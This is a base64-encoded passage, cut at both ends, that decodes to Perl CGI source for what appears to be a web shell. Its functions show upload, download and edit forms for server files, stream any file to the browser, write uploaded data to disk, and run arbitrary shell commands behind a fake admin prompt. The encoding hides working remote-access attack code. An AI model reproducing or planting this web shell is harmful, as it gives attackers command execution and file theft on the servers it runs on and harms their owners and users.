nB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJbXkgJGRpciA9ICZBZGRMaW5rRGlyKCJkb3dubG9hZCIpOyANCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJCAiOw0KCXJldHVybiA8PEVORDsNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgY2xhc3M9ImZpbGUiIHR5cGU9InRleHQiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+DQoNCjwvZm9ybT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCglteSAkZGlyPSAmQWRkTGlua0RpcigidXBsb2FkIik7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsNCglyZXR1cm4gPDxFTkQ7DQo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCiRQcm9tcHQgdXBsb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgY2xhc3M9ImZpbGUiIHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KT3B0aW9uczogJm5ic3A7PGlucHV0IHR5cGU9ImNoZWNrYm94IiBuYW1lPSJvIiBpZD0idXAiIHZhbHVlPSJvdmVyd3JpdGUiPg0KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+DQpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+DQo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4NCg0KPC9mb3JtPg0KDQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bw0KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzDQojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBDb21tYW5kVGltZW91dA0Kew0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgkJcmV0dXJuIDw8RU5EOw0KPC90ZXh0YXJlYT4NCjxicj48Zm9udCBjb2xvcj15ZWxsb3c+DQpDb21tYW5kIGV4Y2VlZGVkIG1heGltdW0gdGltZSBvZiAkQ29tbWFuZFRpbWVvdXREdXJhdGlvbiBzZWNvbmQocykuPC9mb250Pg0KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250Pg0KRU5EDQoJfQ0KfQ0KDQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMgZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsNCglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglteSAkcmVzdWx0PSIiOw0KCWlmKC1lICRGaWxlVXJsKSAjIGlmIHRoZSBmaWxlIGV4aXN0cw0KCXsNCgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3Nlcg0KCQkkRmlsZVVybCA9fiBzLyhbXmEtekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsNCgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkcmVzdWx0IC49IDw8RU5EOw0KU2VuZGluZyBGaWxlICRUcmFuc2ZlckZpbGUuLi48YnI+DQoNCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LA0KPGEgaHJlZj0iJERvd25sb2FkTGluayI+Q2xpY2sgSGVyZTwvYT4NCkVORA0KCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCX0NCgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJHJlc3VsdCAuPSAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIHJlYWRzIHRoZSBzcGVjaWZpZWQgZmlsZSBmcm9tIHRoZSBkaXNrIGFuZCBzZW5kcyBpdCB0byB0aGUNCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIHNlbnQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXINCnsNCglteSAkcmVzdWx0ID0gIiI7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlmKG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNURE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShTRU5ERklMRSk7DQoJCWV4aXQoMSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAkISI7DQoJCSRyZXN1bHQgLj0mUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlDQojIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsgdGhyb3VnaCB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMgVGhpcyBmdW5jdGlvbiBpcyBhbHNvIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGNsaWNrcyBvbiB0aGF0IGxpbmsuIEluIHRoaXMgY2FzZSwNCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCZWdpbkRvd25sb2FkDQp7DQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUNCiMgZmlsZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBzdGFydHMgdGhlIHVwbG9hZCBwcm9jZXNzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFVwbG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4NCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQ0KCXsNCgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOw0KDQoJfQ0KCW15ICRyZXN1bHQ9IiI7DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCgkkcmVzdWx0IC49ICJVcGxvYWRpbmcgJFRyYW5zZmVyRmlsZSB0byAkQ3VycmVudERpci4uLjxicj4iOw0KDQoJIyBnZXQgdGhlIGZ1bGxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgY3JlYXRlZA0KCWNob3AoJFRhcmdldE5hbWUpIGlmICgkVGFyZ2V0TmFtZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7DQoJJFRhcmdldE5hbWUgLj0gJFBhdGhTZXAuJDE7DQoNCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsNCgkjIGlmIHRoZSBmaWxlIGV4aXN0cyBhbmQgd2UgYXJlIG5vdCBzdXBwb3NlZCB0byBvdmVyd3JpdGUgaXQNCglpZigtZSAkVGFyZ2V0TmFtZSAmJiAkT3B0aW9ucyBuZSAib3ZlcndyaXRlIikNCgl7DQoJCSRyZXN1bHQgLj0gIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQkkcmVzdWx0IC49ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCSRyZXN1bHQgLj0gIkZpbGUgUGF0aDogJFRhcmdldE5hbWU8YnI+IjsNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlLiBJZiB0aGUNCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsNCiMgdGhyb3VnaCAgd2hpY2ggdGhlIGZpbGUgY2FuIGJlIGRvd25sb2FkZWQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRG93bmxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4NCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlyZXR1cm4gJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgl9DQoJDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfCAoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCXJldHVybiAmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsNCgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlDQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5DQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4NCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQ0KIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2Vycw0KIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBFeGVjdXRlQ29tbWFuZA0Kew0KCW15ICRyZXN1bHQ9IiI7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoNCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7DQoJCSMgeHVhdCB0aG9uZyB0aW4ga2hpIGNodXllbiBkZW4gMSB0aHUgbXVjIG5hbyBkbyENCgkJJFJ1bkNvbW1hbmQ9ICRXaW5OVD8iZGlyIjoiZGlyIC1saWEiOw0KCQkkcmVzdWx0IC49ICZSdW5DbWQ7DQoJfWVsc2lmKCRSdW5Db21tYW5kID1+IG0vXlxzKmVkaXRccysoLispLykNCgl7DQoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07DQoJfWVsc2UNCgl7DQoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSRyZXN1bHQgLj0gIkNvbW1hbmQ6IDxydW4+JFJ1bkNvbW1hbmQ8L3J1bj48YnI+PHRleHRhcmVhIGlkPSdkYXRhJyBjb2xzPSckY29scycgcm93cz0nJHJvd3MnIHNwZWxsY2hlY2s9J2ZhbHNlJz4iOw0KCQkkcmVzdWx0IC49JlJ1bkNtZDsNCgl9DQoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBydW4gY29tbWFuZA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQpzdWIgUnVuQ21kDQp7DQoJbXkgJHJlc3VsdD0iIjsNCgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7DQoJaWYoISRXaW5OVCkNCgl7DQoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7DQoJCWFsYXJtKCRDb21tYW5kVGltZW91dER1cmF0aW9uKTsNCgl9DQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZA0KCXsNCgkJJHw9MTsNCgkJJENvbW1hbmQgLj0gIiB8IjsNCgkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCXdoaWxlKDxDb21tYW5kT3V0cHV0PikNCgkJew0KCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkkcmVzdWx0IC49ICZIdG1sU3BlY2lhbENoYXJzKCIkX1xuIik7DQoJCX0NCgkJJHw9MDsNCgl9DQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzDQoJew0KCQkkcmVzdWx0IC49ICZIdG1sU3BlY2lhbENoYXJzKCckQ29tbWFuZCcpOw0KCX0NCglpZighJFdpbk5UKQ0KCXsNCgkJYWxhcm0oMCk7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KIyBGb3JtIFNhdmUgRmlsZSANCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCnN1YiBTYXZlRmlsZUZvcm0NCnsNCglteSAkcmVzdWx0ID0iIjsNCglzdWJzdHIoJFJ1bkNvbW1hbmQsMCw1KT0iIjsNCglteSAkZmlsZT0mdHJpbSgkUnVuQ29tbWFuZCk7DQoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7DQoJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuJFJ1bkNvbW1hbmQ7DQoJbXkgJGRpcj0iPHNwYW4gc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz4iLiZBZGRMaW5rRGlyKCJndWkiKS4iPC9zcGFuPiI7DQoJaWYoLXcgJEZpbGUpDQoJew0KCQkkcm93cz0iMjMiDQoJfWVsc2UNCgl7DQoJCSRtc2c9Ijxicj48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hOyBjb2xvcjogeWVsbG93OycgPiBQZXJtaXNzaW9uIGRlbmllZCE8Zm9udD48YnI+IjsNCgkJJHJvd3M9IjIwIg0KCX0NCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIjxmb250IGNvbG9yPScjRkZGRkZGJz5bYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQ8L2ZvbnQ+ICI7DQoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsNCgkkUnVuQ29tbWFuZCA9ICIkcmVhZCBcIiRSdW5Db21tYW5kXCIiOw0KCSRyZXN1bHQgLj0gIDw8RU5EOw0KCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KDQoJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCgkkUHJvbXB0DQoJPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjQwIiBuYW1lPSJjIj4NCgk8aW5wdXQgbmFtZT0icyIgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPg0KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4NCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmaWxlIiB2YWx1ZT0iJGZpbGUiID4gJHNhdmUgPGJyPiAkbXNnDQoJPGJyPjx0ZXh0YXJlYSBpZD0iZGF0YSIgbmFtZT0iZGF0YSIgY29scz0iJGNvbHMiIHJvd3M9IiRyb3dzIiBzcGVsbGNoZWNrPSJmYWxzZSI+DQpFTkQNC